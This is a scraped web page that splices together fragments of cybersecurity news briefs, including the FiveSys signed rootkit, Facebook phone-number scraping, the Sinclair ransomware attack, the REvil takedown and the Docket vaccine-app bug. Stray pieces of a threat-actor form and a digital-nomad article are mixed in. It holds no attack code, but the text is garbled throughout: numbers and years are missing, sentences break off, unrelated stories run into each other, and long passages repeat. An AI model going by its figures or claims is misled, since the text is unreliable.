In addition to countries competing to serve and attract digital nomads, a number of well-financed startups such as Jobbatical, Remote, and Oyster are creating private-sector solutions to issues posed by people and companies going remote. Cybersecurity researchers at Bitdefender say cyber criminals have been using a rootkit named FiveSys "that somehow made its way through the driver certification process to be digitally signed by Microsoft ," reports ZDNet: The valid signature enables the rootkit — malicious software that allows cyber criminals to access and control infected computers — to appear valid and bypass operating systems restrictions and gain what researchers describe as "virtually unlimited privileges".
It's known for cyber criminals to use stolen digital certificates, but in this case, they've managed to acquire a valid one. It's a still a mystery how cyber criminals were able to get hold of a valid certificate. While the digital signing requirements detect and stop most of the rootkits, they are not foolproof," Bogdan Botezatu, director of threat research and reporting at Bitdefender told ZDNet. It's uncertain how FiveSys is actually distributed, but researchers believe that it's bundled with cracked software downloads.
Once installed, FiveSys rootkit redirects internet traffic to a proxy server, which it does by installing a custom root certificate so that the browser won't warn about the unknown identity of the proxy. This also blocks other malware from writing on the drivers, in what's likely an attempt to stop other cyber criminals from taking advantage of the compromised system. Analysis of attacks shows that FiveSys rootkit is being used in cyber attacks targeting online gamers, with the aim of stealing login credentials and the ability to hijack in-game purchases.
The popularity of online games means that a lot of money can be involved — not only because banking details are connected to accounts, but also because prestigious virtual items can fetch large sums of money when sold, meaning attackers could exploit access to steal and sell these items.
Currently, the attacks are targeting gamers in China — which is where researchers also believe that the attackers are operating from. According to court documents filed Friday, the man was identified as Alexander Alexandrovich Solonchenko, a resident of Kirovograd, Ukraine. Facebook alleges that Solonchenko abused a feature part of the Facebook Messenger service called Contact Importer.
The feature allowed users to synchronize their phone address books and see which contacts had a Facebook account in order to allow users to reach out to their friends via Facebook Messenger.
Between January and September , Facebook said that Solonchenko used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers.
As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later collected and offered for sale on December 1, , in a post on RaidForums, a notorious cybercrime forum and marketplace for stolen data. The article also notes that Facebook's court documents say Solonchenko scraped data from some of the largest companies in the Ukraine, including its largest commercial bank and largest private delivery service.
And the Record points out that he's not the only person known to have this hole to scrape Facebook's user data and then sell it on the forum. Days after another incident in April involving leaked phone numbers of Facebook user , Facebook "revealed that it retired the Messenger Contact Importer feature back in September after it discovered Solonchenko and other threat actors abusing it. An anonymous reader quotes a report from Motherboard: In the early hours of Sunday morning, hackers took down the corporate servers and systems of Sinclair Broadcast Group, a giant U.
TV conglomerate that owns or operates more than channels across the country. Days later, inside the company, "it's pandemonium and chaos ," as one current employee, who asked to remain anonymous as they were not authorized to speak to the press, told Motherboard. Sinclair has released very few details about the attack since it was hacked Sunday. On Wednesday, Bloomberg reported that the group behind the attack is the infamous Evil Corp. Treasury department in The ransomware attack interfered with several channels' broadcast programming, preventing them from airing ads or NFL games, as reported by The Record, a news site owned by cybersecurity firm Recorded Future.
It has also left employees confused and wondering what's going on, according to current Sinclair workers. Employees did not have access to their emails until Tuesday morning, according to the two employees and text messages seen by Motherboard. The office computers, however, are still locked by the company out of precaution, and Sinclair told employees not to log into their corporate VPN, which they usually used to do their jobs.
Until Thursday, the company was communicating with employees via text, according to the sources, who shared some of the texts sent by the company. In one of them, they called for an all hands meeting. The meeting, according to the two current employees, was quick and vague. Both sources said that the company should be more transparent with its own employees. But on one major U. The crash occurred during a massive sell-off on the Binance.
US exchange that occurred around a. ET, Bloomberg reported. Binance is the largest cryptocurrency exchange in the world, and its Binance. US exchange is meant to be compliant with U. According to a Binance. US spokesperson, the crash was due to an issue with a trading algorithm being run by one "institutional trader," which may indicate an investment fund of some sort. US told Bloomberg. Intel has open-sourced ControlFlag , a tool that uses machine learning to detect problems in computer code -- ideally to reduce the time required to debug apps and software.
From a report: In tests, the company's machine programming research team says that ControlFlag has found hundreds of defects in proprietary, "production-quality" software, demonstrating its usefulness. In addition, ControlFlag found dozens of novel anomalies on several high-quality open-source software repositories. After years of study, they learn to translate abstracts into concrete, executable programs -- but most spend the majority of their working hours not programming.
An anonymous reader shares a report from Reuters: The ransomware group REvil was itself hacked and forced offline this week by a multi-country operation , according to three private sector cyber experts working with the United States and one former official. Former partners and associates of the Russian-led criminal gang were responsible for a May cyberattack on the Colonial Pipeline that led to widespread gas shortages on the U.
East Coast. REvil's direct victims include top meatpacker JBS. The crime group's "Happy Blog" website, which had been used to leak victim data and extort companies, is no longer available.
Officials said the Colonial attack used encryption software called DarkSide, which was developed by REvil associates. VMWare head of cybersecurity strategy Tom Kellermann said law enforcement and intelligence personnel stopped the group from victimizing additional companies. Secret Service on cybercrime investigations. That breach opened access to hundreds of Kaseya's customers all at once, leading to numerous emergency cyber incident response calls. Following the attack on Kaseya, the FBI obtained a universal decryption key that allowed those infected via Kaseya to recover their files without paying a ransom.
But law enforcement officials initially withheld the key for weeks as it quietly pursued REvil's staff, the FBI later acknowledged. According to three people familiar with the matter, law enforcement and intelligence cyber specialists were able to hack REvil's computer network infrastructure, obtaining control of at least some of their servers. After websites that the hacker group used to conduct business went offline in July, the main spokesman for the group, who calls himself "Unknown," vanished from the internet.
Vaughan-Nichols writes: This will be ugly. Or, as Stephen Williams, who uncovered the bug put it, "I have a feeling that there will be some 'interesting moments' in the early morning when a bunch of the world's stratum 1 NTP servers using GPSD take the long strange trip back to Miller has acknowledged the problem, and a fix has been made to the code. So, what's the problem if the fix is already in? Well, there are two problems. First, it won't be backported to previous releases.
If you're still using an older version, you may be out of luck. It's a legacy GPS problem. This means every Or, as Miller noted , "This code is a week time warp waiting to happen. And, if, like most of us, you're relying on someone upstream from you for the correct time, check with them to make sure they've taken care of this forthcoming trouble. AMD and Microsoft have issued patches to address the slowdowns reported with Ryzen processors when Windows 11 launched. Engadget reports: The latest chipset driver version 3.
That could have slowed down apps that are sensitive to CPU thread performance. Meanwhile, Microsoft is rolling out a software update tackling a bug that increased L3 cache latency. The issue impacted apps that need quick memory access, which in turn caused CPUs to slow down by up to 15 percent. The patch, Windows 11 update KB, will be available starting today, but at the time of writing, a page containing instructions for installing it isn't yet live.
You should be able to install it via Windows Update too. Almost two years after a wave of complaints flooded Google's support forums about YouTube accounts getting hijacked even if users had two-factor authentication enabled, Google's security team has finally tracked down the root cause of these attacks.
From a report: In a report published today, the Google Threat Analysis Group TAG attributed these incidents to "a group of hackers recruited in a Russian-speaking forum. YouTubers were typically lured with potential sponsorship deals. Victims were asked to install and test various applications and then publish a review. Apps typically used in these schemes involved antivirus software, VPN clients, music players, photo editors, PC optimizers, or online games.
But unbeknownst to the targets, the hackers hid malware inside the apps. Once the YouTube creators received and installed the demo app, the installer would drop malware on their devices, malware which would extract login credentials and authentication cookies from their browsers and send the stolen data to a remote server. The hackers would then use the authentication cookies to access a YouTuber's account -- bypassing the need to enter a two-factor authentication 2FA token -- and move to change passwords and the account's recovery email and phone numbers.
With the victims locked out of their accounts, the hackers would typically sell the hijacked YouTube channel on underground marketplaces for stolen identities.
Mike Parson escalated his war with the St. Louis Post-Dispatch on Wednesday when his political operation published a video doubling down on his attack against a reporter who informed the state that a state website revealed teacher Social Security numbers.
From a report: The video is produced by Uniting Missouri, a political action committee created by Parson supporters to back his election campaign. The PAC continues to raise and spend large sums of money to promote Parson's political agenda. It operates without direct input from Parson on its activities.
Louis Post-Dispatch is purely playing politics," the ad states. John Hancock, chairman of Uniting Missouri, declined to discuss any specifics about the video. Google today released Chrome v95, the latest version of its popular web browser and a version that contains several changes that will likely cause problems for a considerable part of its users. A weekend cyberattack against Sinclair Broadcast Group was linked to one of the most infamous Russian cybergangs, called Evil Corp , Bloomberg reports.
From the report: The Sinclair hackers used malware called Macaw, a variant of ransomware known as WastedLocker. Evil Corp. Treasury Department in Since then, it has been accused by cybersecurity experts of rebranding in an attempt to avoid the sanctions. People in the U. An anonymous reader quotes a report from Engadget: Under Acting Chairwoman Jessica Rosenworcel, the Federal Communications Commission is seeking to create new rules targeting spam text messages.
Like another recent proposed rulemaking from the agency, the policy would push wireless carriers and telephone companies to block the spam before it ever gets to your phone.
Akamai researchers have analyzed 10, JavaScript samples including malware droppers, phishing pages, scamming tools, Magecart snippets, cryptominers, etc. BleepingComputer reports: Obfuscation is when easy-to-understand source code is converted into a hard to understand and confusing code that still operates as intended. Threat actors commonly use obfuscation to make it harder to analyze malicious scripts and to bypass security software.
Obfuscation can be achieved through various means like the injection of unused code into a script, the splitting and concatenating of the code breaking it into unconnected chunks , or the use of hexadecimal patterns and tricky overlaps with function and variable naming. But not all obfuscation is malicious or tricky. As the report explains, about 0. As such, detecting malicious code based on the fact that is obfuscated isn't enough on its own, and further correlation with malicious functionality needs to be made.
This mixing with legitimate deployment is precisely what makes the detection of risky code challenging, and the reason why obfuscation is becoming so widespread in the threat landscape. A hacker has breached the Argentinian government's IT network and stolen ID card details for the country's entire population , data that is now being sold in private circles.
From a report: The agency is a crucial cog inside the Argentinian Interior Ministry, where it is tasked with issuing national ID cards to all citizens, data that it also stores in digital format as a database accessible to other government agencies, acting as a backbone for most government queries for citizen's personal information. The attack requires the setting up of a replica of the target ATM because training the algorithm for the specific dimensions and key spacing of the different PIN pads is crucially important.
Next, the machine-learning model is trained to recognize pad presses and assign specific probabilities on a set of guesses, using video of people typing PINs on the ATM pad. For the experiment, the researchers collected 5, videos of 58 different people of diverse demographics, entering 4-digit and 5-digit PINs. The model can exclude keys based on the non-typing hand coverage, and deduces the pressed digits from the movements of the other hand by evaluating the topological distance between two keys.
The placement of the camera which captures the tries plays a key role, especially if recording left or right-handed individuals. Change Description Change the existing description like you think it would be advisable. Please select an option Add new actor Remove existing actor.
New Actor for win. Periscope, TEMP. Hermit TEMP. Which actor do you think should be removed? Feel free to include references. Cancel Submit.
Select Content. Organization optional. Referenced families optional Select families Cobalt Strike Conti.
Agency for International Development Cobalt Strike. Boombox lets Tesla owners add custom horn and pedestrian warning sounds to the vehicle. Tesla owners will now be able to warn potential vandals more explicitly by giving them verbal warnings from a remote location In a tweet Wednesday, Elon Musk joked the feature was also " great for practical jokes. According to a post on the Signal blog, a federal grand jury in the Central District of California has subpoena'd Signal for a whole pile of user data , like subscriber information, financial information, transaction histories, communications, and more.
HotHardware reports: The thing is, the subpoena is moot: Signal simply doesn't have the data to provide. The company can't provide any of the data that the grand jury is asking for because, as the company itself notes, "Signal doesn't have access to your messages, your chat list, your groups, your contacts, your stickers, [or] your profile name or avatar. The announcement and, we suppose, this news post essentially amounts to an advertisement for Signal, but it's an amusing -- or possibly distressing -- anecdote nonetheless.
While Signal is secure, keep in mind that the messages still originate from your device, which means that other apps on your device like, say, your keyboard could still be leaking your data. Lest you doubt Signal's story, the app creators have published the subpoena, suitably redacted, on their blog.
Hive, a ransomware group that has hit over 30 organizations since June , now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms.
BleepingComputer reports: However, as Slovak internet security firm ESET discovered , Hive's new encryptors are still in development and still lack functionality. The Linux variant also proved to be quite buggy during ESET's analysis, with the encryption completely failing when the malware was executed with an explicit path. It also comes with support for a single command line parameter -no-wipe. In contrast, Hive's Windows ransomware comes with up to 5 execution options, including killing processes and skipping disk cleaning, uninteresting files, and older files.
The ransomware's Linux version also fails to trigger the encryption if executed without root privileges because it attempts to drop the ransom note on compromised devices' root file systems. An anonymous reader quotes a report from Motherboard: So far this year, almost 1, schools across the country have suffered from a ransomware attack , and in some cases had classes disrupted because of it, according to tallies by Emsisoft, a cybersecurity company that specializes in tracking and investigating ransomware attacks, and another cybersecurity firm Recorded Future.
Brett Callow, a researcher at Emsisoft shared the list with Motherboard. It includes 73 school districts, comprising schools. Callow said that it's very likely there's some schools that are missing from the list, meaning the total number of victims is likely higher than 1, The list includes schools such as the Mesquite Independent School District in Texas , which comprises 49 different schools; the Haverhill Public Schools in Massachusetts , which comprises 16 schools; and the Visalia Unified School District in California , which comprises 41 schools.
While most ransomware attacks are not targeted there are two sectors that ransomware groups do seem to enjoy going after are healthcare and schools," Liska said. Schools pay significantly less in average ransom than most sectors when they pay, which is rare , so the ransomware groups are not going after schools for the money.
An anonymous reader quotes a report from KrebsOnSecurity: In December , bling vendor Signet Jewelers fixed a weakness in their Kay Jewelers and Jared websites that exposed the order information for all of their online customers. This week, Signet subsidiary Zales. Last week, KrebsOnSecurity heard from a reader who was browsing Zales.
The reader noticed that the link for the order information she'd stumbled on included a lengthy numeric combination that -- when altered -- would produce yet another customer's order information.
When the reader failed to get an immediate response from Signet, KrebsOnSecurity contacted the company. In a written response, Signet said, "A concern was brought to our attention by an IT professional. We addressed it swiftly, and upon review we found no misuse or negative impact to any systems or customer data.
As a result, we exceed industry benchmarks on data protection maturity. We always appreciate it when consumers reach out to us with feedback, and have committed to further our efforts on data protection maturity. That would be a pretty convincing scam. Or just targeted phishing attacks. A security bug in the health app Docket exposed the private information of residents vaccinated against COVID in New Jersey and Utah, where the app received endorsements from state officials.
From a report: Docket lets residents download and carry a digital copy of their immunizations by pulling their vaccination records from their state's health authority. The digital copy has the same information as the COVID paper card, but is digitally signed by the state to prevent forgeries.
Docket is one of several so-called vaccine passports in the U. But for a time, the app allowed anyone access to the QR codes of other vaccinated users -- and all the personal and vaccine information encoded within. That included names, dates of birth and information about a person's COVID vaccination status, such as which type of vaccine they received and when.
TechCrunch discovered the bug on Tuesday and immediately contacted the company. Docket chief executive Michael Perretta said the bug was fixed at the server level a few hours later. The bug was found in how the Docket app requests the user's QR code from its servers. The user's QR code is generated on the server in the form of a SMART Health Card, a widely accepted standard for validating a person's vaccination status across the world.
That QR code is tied to a user ID, which isn't visible from the app, but can be viewed by looking at its network traffic using off-the-shelf software like Burp Suite or Charles Proxy. Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began.
NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.
Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.
The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack ISNA later removed its reports, claiming that it too had been hacked.
Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy. From a report: The attack on the Ethereum-based lending protocol was first reported by The Block Crypto, which cited a tweet by PeckShield highlighting a large flash-loan transaction that carried out the theft. The burgeoning DeFi landscape has drawn in billions of dollars in investor funds, but it has been a frequent target by hackers, with many using flash loans -- a type of uncollateralized lending -- as a way to exploit poorly protected protocols.
From a report: The organization's name was listed on a dark web portal, often called a "leak site," where the Grief gang typically lists companies they infected and which haven't paid their ransom demands.
It remains unclear if the Grief gang hit one of the NRA's smaller branches or if the attack hit the organization's central network. Ransomware gangs often like to exaggerate their attacks. An anonymous reader quotes a report from KrebsOnSecurity: U.
KrebsOnSecurity has learned the raid is tied to reports that PAX's systems may have been involved in cyberattacks on U. Earlier today, Jacksonville, Fla. In an official statement, investigators told WOKV only that they were executing a court-authorized search at the warehouse as a part of a federal investigation, and that the inquiry included the Department of Customs and Border Protection and the Naval Criminal Investigative Services NCIS.
According to that source, the payment processor found that the PAX terminals were being used both as a malware "dropper" -- a repository for malicious files -- and as "command-and-control" locations for staging attacks and collecting information.
The source said two major financial providers -- one in the United States and one in the United Kingdom -- had already begun pulling PAX terminals from their payment infrastructure, a claim that was verified by two different sources. The source was unable to share specific details about the strange network activity that prompted the FBI's investigation. But it should be noted that point-of-sale terminals and the technology that supports them are perennial targets of cybercriminals.
An indie developer has found an interesting observation: Though only 5. Not because the Linux platform was buggier, either. Only 3 of the roughly bug reports submitted by Linux users were platform specific, that is, would only happen on Linux. Koderski also says that very few of those bugs were specific to Linux, being clear that "This 5. Multiple commenters on the post chalked this up to the kind of people who use Linux: Software professionals, IT employees, and engineers who would already be familiar with official bug reporting processes.
It's a strong theory as to why this might be, though the sheer passion that the gaming on Linux community has for anyone who supports their favorite hobby may be another. Microsoft said on Monday that a Russian state-sponsored hacking group known as Nobelium had attacked more than IT and cloud services providers , successfully breaching 14 companies.
The attacks included spear-phishing campaigns and password-spraying operations that targeted employees of companies that manage IT and cloud infrastructure on behalf of their clients.
It's estimated there are Digital nomads' growing numbers and financial clout have caused dozens of tourist-starved countries to update their travel policies for borderless workers. In Summer , a handful of nations launched visa programs to attract digital nomads, starting with Estonia in June , then Barbados, Bermuda, Costa Rica, Anguilla, Antigua, and later, most of Eastern Europe.
Sweetheart deals like income tax breaks , subsidized housing , and free multiple entry have become as popular as employee work benefits.
The opportunities are so numerous, solutions exist just to help you "amenity shop" the perfect country Airbnb style Some ambitious nomads, like activist and author Lauren Razavi , have also started to advocate for their rights as global citizens and the future of borderless work Remote workers like Lauren and us want to completely redefine the role governments play in digital nomads' movement and regulation. By laying the foundation for the next generation of travel and work, an internet country called Plumia Plumia wants to build the alternative using decentralized technologies, while also working with countries and institutions on policies that achieve common goals Begun in as an independent project by remote-first travel insurance company, SafetyWing , Plumia's plan is to combine the infrastructure for living anywhere with the functions of a geographic country Blockchain enthusiasts are also testing an approach that begs the question: are traditional countries still necessary?
Bitnation advocates for decentralizing authority by empowering voluntary participation and peer-to-peer agreements. Currently in development, Plumia is focusing on developing member-focused services and content Verifying a digital identity, maintaining a 'permanent address' whilst on the move, switching service providers and jurisdictions on the fly, complying with complicated tax and labor laws — these are all thorny issues to solve.
Initiatives like Plumia are jumping into quite an active ring, however. In addition to countries competing to serve and attract digital nomads, a number of well-financed startups such as Jobbatical, Remote, and Oyster are creating private-sector solutions to issues posed by people and companies going remote. Cybersecurity researchers at Bitdefender say cyber criminals have been using a rootkit named FiveSys "that somehow made its way through the driver certification process to be digitally signed by Microsoft ," reports ZDNet: The valid signature enables the rootkit — malicious software that allows cyber criminals to access and control infected computers — to appear valid and bypass operating systems restrictions and gain what researchers describe as "virtually unlimited privileges".
It's known for cyber criminals to use stolen digital certificates, but in this case, they've managed to acquire a valid one. It's a still a mystery how cyber criminals were able to get hold of a valid certificate. While the digital signing requirements detect and stop most of the rootkits, they are not foolproof," Bogdan Botezatu, director of threat research and reporting at Bitdefender told ZDNet. It's uncertain how FiveSys is actually distributed, but researchers believe that it's bundled with cracked software downloads.
Once installed, FiveSys rootkit redirects internet traffic to a proxy server, which it does by installing a custom root certificate so that the browser won't warn about the unknown identity of the proxy. This also blocks other malware from writing on the drivers, in what's likely an attempt to stop other cyber criminals from taking advantage of the compromised system. Analysis of attacks shows that FiveSys rootkit is being used in cyber attacks targeting online gamers, with the aim of stealing login credentials and the ability to hijack in-game purchases.
The popularity of online games means that a lot of money can be involved — not only because banking details are connected to accounts, but also because prestigious virtual items can fetch large sums of money when sold, meaning attackers could exploit access to steal and sell these items.
Currently, the attacks are targeting gamers in China — which is where researchers also believe that the attackers are operating from. According to court documents filed Friday, the man was identified as Alexander Alexandrovich Solonchenko, a resident of Kirovograd, Ukraine. Facebook alleges that Solonchenko abused a feature part of the Facebook Messenger service called Contact Importer. The feature allowed users to synchronize their phone address books and see which contacts had a Facebook account in order to allow users to reach out to their friends via Facebook Messenger.
Between January and September , Facebook said that Solonchenko used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers. As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later collected and offered for sale on December 1, , in a post on RaidForums, a notorious cybercrime forum and marketplace for stolen data.
The article also notes that Facebook's court documents say Solonchenko scraped data from some of the largest companies in the Ukraine, including its largest commercial bank and largest private delivery service. And the Record points out that he's not the only person known to have this hole to scrape Facebook's user data and then sell it on the forum.
Days after another incident in April involving leaked phone numbers of Facebook user , Facebook "revealed that it retired the Messenger Contact Importer feature back in September after it discovered Solonchenko and other threat actors abusing it.
An anonymous reader quotes a report from Motherboard: In the early hours of Sunday morning, hackers took down the corporate servers and systems of Sinclair Broadcast Group, a giant U. TV conglomerate that owns or operates more than channels across the country. Days later, inside the company, "it's pandemonium and chaos ," as one current employee, who asked to remain anonymous as they were not authorized to speak to the press, told Motherboard. Sinclair has released very few details about the attack since it was hacked Sunday.
On Wednesday, Bloomberg reported that the group behind the attack is the infamous Evil Corp. Treasury department in The ransomware attack interfered with several channels' broadcast programming, preventing them from airing ads or NFL games, as reported by The Record, a news site owned by cybersecurity firm Recorded Future.
It has also left employees confused and wondering what's going on, according to current Sinclair workers. Employees did not have access to their emails until Tuesday morning, according to the two employees and text messages seen by Motherboard. The office computers, however, are still locked by the company out of precaution, and Sinclair told employees not to log into their corporate VPN, which they usually used to do their jobs.
Until Thursday, the company was communicating with employees via text, according to the sources, who shared some of the texts sent by the company. In one of them, they called for an all hands meeting. The meeting, according to the two current employees, was quick and vague.
Both sources said that the company should be more transparent with its own employees. But on one major U.
0コメント